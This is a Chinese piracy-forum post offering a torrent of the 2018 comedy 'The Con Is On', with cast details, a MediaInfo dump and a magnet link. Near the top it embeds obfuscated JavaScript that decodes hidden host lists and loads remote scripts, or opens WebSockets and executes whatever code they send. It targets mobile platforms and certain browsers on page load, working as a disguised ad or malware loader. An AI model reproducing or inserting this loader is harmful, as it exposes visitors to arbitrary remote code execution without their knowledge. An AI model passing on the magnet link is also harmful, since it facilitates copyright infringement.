英国佬来了[中文字幕].The.Con.Is.On.2018.1080p.BluRay.x265.10bit.DTS 5.21GB

版主小s 17天前 117

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 英国佬来了/The Brits Are Coming
◎片  名 The Con Is On
◎年  代 2018
◎产  地 美国,英国
◎类  别 喜剧
◎语  言 英语,西班牙语,日语,俄语,汉语普通话
◎上映日期 2018-05-04(美国) / 2018-05-25(西班牙)
◎豆瓣评分 4.3/10 from 884 users
◎豆瓣链接 https://movie.douban.com/subject/26390259/
◎片  长 90分钟
◎导  演 詹姆斯·奥克利 James Oakley
◎编  剧 詹姆斯·奥克利 James Oakley / Alex Michaelides Alex Michaelides
◎主  演 爱丽丝·伊芙 Alice Eve
       索菲娅·维加拉 Sofía Vergara
       克里斯平·格洛弗 Crispin Glover
       乌玛·瑟曼 Uma Thurman
       阿什利·威廉姆斯 Ashley Williams
       李美琪 Maggie Q
       蒂姆·罗斯 Tim Roth
       帕克·波西 Parker Posey
       斯蒂芬·弗雷 Stephen Fry
       梅丽莎·苏·安德森 Melissa Sue Anderson
       莎朗·摩翰 Sharon Maughan
       道格·海利 Doug Haley
       威尔莫·卡德隆 Wilmer Calderon
       梅林达·希尔 Melinda Hill
       杰夫·博斯利 Jeff Bosley
       曼哈顿·尼夫斯 Manhattan Nieves
       威廉·阿巴迪 William Abadie

◎标  签 喜剧 | 英国 | 美国 | 黑色幽默 | 乌玛·瑟曼 | 2018 | 这啥玩意啊? | 犯罪

◎简  介

  乌玛·瑟曼主演喜剧片《英国佬来了》,故事讲述一对古怪的英国夫妇计划去洛杉矶盗窃珠宝。导演詹姆斯·奥克利将于今年7月开拍本片。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 225360541116705429101960008087813023621 (0xA98ADC8776762D23F368FCE6DD2CE785)

  4. Complete name                            : [email protected]mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.21 GiB

  8. Duration                                 : 1 h 35 min

  9. Overall bit rate                         : 7 825 kb/s

  10. Encoded date                             : UTC 2021-08-28 07:34:16

  11. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 35 min

  20. Bit rate                                 : 6 236 kb/s

  21. Width                                    : 1 920 pixels

  22. Height                                   : 804 pixels

  23. Display aspect ratio                     : 2.40:1

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 23.976 (24000/1001/53354) FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 10 bits

  29. Bits/(Pixel*Frame)                       : 0.168

  30. Stream size                              : 4.15 GiB (80%)

  31. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings                        : rc=crf / crf=15.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=9 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x804 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default                                  : Yes

  34. Forced                                   : No


  35. Audio

  36. ID                                       : 2

  37. Format                                   : DTS

  38. Format/Info                              : Digital Theater Systems

  39. Codec ID                                 : A_DTS

  40. Duration                                 : 1 h 35 min

  41. Bit rate mode                            : Constant

  42. Bit rate                                 : 1 509 kb/s

  43. Channel(s)                               : 6 channels

  44. Channel layout                           : C L R Ls Rs LFE

  45. Sampling rate                            : 48.0 kHz

  46. Frame rate                               : 93.750 FPS (512 SPF)

  47. Bit depth                                : 24 bits

  48. Compression mode                         : Lossy

  49. Stream size                              : 1.01 GiB (19%)

  50. Title                                    : eng

  51. Language                                 : English

  52. Default                                  : Yes

  53. Forced                                   : No


  54. Text #1

  55. ID                                       : 3

  56. Format                                   : PGS

  57. Muxing mode                              : zlib

  58. Codec ID                                 : S_HDMV/PGS

  59. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  60. Duration                                 : 1 h 29 min

  61. Bit rate                                 : 45.2 kb/s

  62. Count of elements                        : 2027

  63. Stream size                              : 28.9 MiB (1%)

  64. Title                                    : chs&eng

  65. Language                                 : Chinese

  66. Default                                  : Yes

  67. Forced                                   : No


  68. Text #2

  69. ID                                       : 4

  70. Format                                   : PGS

  71. Muxing mode                              : zlib

  72. Codec ID                                 : S_HDMV/PGS

  73. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration                                 : 1 h 29 min

  75. Bit rate                                 : 45.4 kb/s

  76. Count of elements                        : 2027

  77. Stream size                              : 29.0 MiB (1%)

  78. Title                                    : cht&eng

  79. Language                                 : Chinese

  80. Default                                  : No

  81. Forced                                   : No


  82. Text #3

  83. ID                                       : 5

  84. Format                                   : PGS

  85. Muxing mode                              : zlib

  86. Codec ID                                 : S_HDMV/PGS

  87. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  88. Duration                                 : 1 h 29 min

  89. Bit rate                                 : 25.7 kb/s

  90. Count of elements                        : 2027

  91. Stream size                              : 16.4 MiB (0%)

  92. Title                                    : chs

  93. Language                                 : Chinese

  94. Default                                  : No

  95. Forced                                   : No


  96. Text #4

  97. ID                                       : 6

  98. Format                                   : PGS

  99. Muxing mode                              : zlib

  100. Codec ID                                 : S_HDMV/PGS

  101. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration                                 : 1 h 29 min

  103. Bit rate                                 : 25.9 kb/s

  104. Count of elements                        : 2027

  105. Stream size                              : 16.5 MiB (0%)

  106. Title                                    : cht

  107. Language                                 : Chinese

  108. Default                                  : No

  109. Forced                                   : No


  110. Text #5

  111. ID                                       : 7

  112. Format                                   : PGS

  113. Muxing mode                              : zlib

  114. Codec ID                                 : S_HDMV/PGS

  115. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration                                 : 1 h 27 min

  117. Bit rate                                 : 37.0 kb/s

  118. Count of elements                        : 2010

  119. Stream size                              : 23.1 MiB (0%)

  120. Title                                    : eng

  121. Language                                 : English

  122. Default                                  : No

  123. Forced                                   : No



TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:3F3F6BF6CE3624E364A216F9000E3B704F72100B
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回